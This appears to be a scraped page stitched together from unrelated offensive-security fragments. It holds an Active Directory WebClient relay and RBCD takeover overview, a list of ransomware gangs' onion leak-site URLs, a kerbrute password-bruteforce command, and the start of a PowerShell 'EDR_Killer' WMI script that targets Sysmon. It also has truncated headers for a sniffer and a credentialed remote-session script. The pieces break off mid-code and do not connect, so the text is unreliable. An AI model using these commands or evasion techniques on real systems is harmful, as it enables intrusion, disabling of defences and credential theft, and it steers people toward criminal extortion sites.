Andre Gironda andregironda

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
Relaying that machine authentication to LDAPS for configuring RBCD
RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

Ransomware Name	URL	Status
AVADDON	http://avaddongun7rngel.onion/	Online
SODINOKIBI (REVIL)	http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/	Online
NEFILIM	http://hxt254aygrsziejn.onion/	Online
VFOKX (1)	http://vfokxcdzjbpehgit223vzdzwte47l3zcqtafj34qrr26htjo4uf3obid.onion/	Online
VFOKX (2)	http://746pbrxl7acvrlhzshosye3b3udk4plurpxt2pp27pojfhkkaooqiiqd.onion/	Online
MARKETO (deep)	https://marketo.cloud/	Online
MARKETO (dark)	http://g5sbltooh2okkcb2.onion/	Online
LORENZ	http://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion/	Online
CONTI/RYUK	http://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion/	Online

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

	import requests

	##########
	### MITRE ATT&CK ONELINERS
	### for constructing Python objects
	### with all ATT&CK techniques in them
	### using the latest MITRE ATT&CK data
	##########

	# Get MITRE ATT&CK technique objects as list

	# PowerShell 2.0
	# Name: EDR_Killer.ps1
	# Version: 1.0
	# Author: @mgreen27
	# Description: Powershell WMI Event Consumer Proof of Concept to disable EDR tools when installed.
	# Original Template (Eventlog Consumer) attributed to @mattifestation: https://gist.github.com/mattifestation/aff0cb8bf66c7f6ef44a

	# Set Variables
	$Name = 'EDR_Killer'
	$Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 30 WHERE TargetInstance ISA "Win32_Service" AND (TargetInstance.Name = "Sysmon" OR TargetInstance.Name = "Service name 2" OR TargetInstance.Name = "Service Name ..." OR TargetInstance.Name = "Service name N")'

	#!/usr/bin/env python
	#DiabloHorn https://diablohorn.com
	#raw python pcap creater
	#based on
	# http://askldjd.com/2014/01/15/a-reasonably-fast-python-ip-sniffer/
	#additional references
	# http://www.kanadas.com/program-e/2014/08/raw_socket_communication_on_li.html

	import sys
	import time

	#############
	### SETUP ###
	#############

	# Set up remote session
	$Credential = Get-Credential TestUser
	$AdminCred = Get-Credential Administrator
	$SessionOption = New-CimSessionOption -Protocol Dcom
	$CimSession = New-CimSession -Credential $Credential -ComputerName TestPC -SessionOption $SessionOption
	$AdminCimSession = New-CimSession -Credential $AdminCred -ComputerName TestPC -SessionOption $SessionOption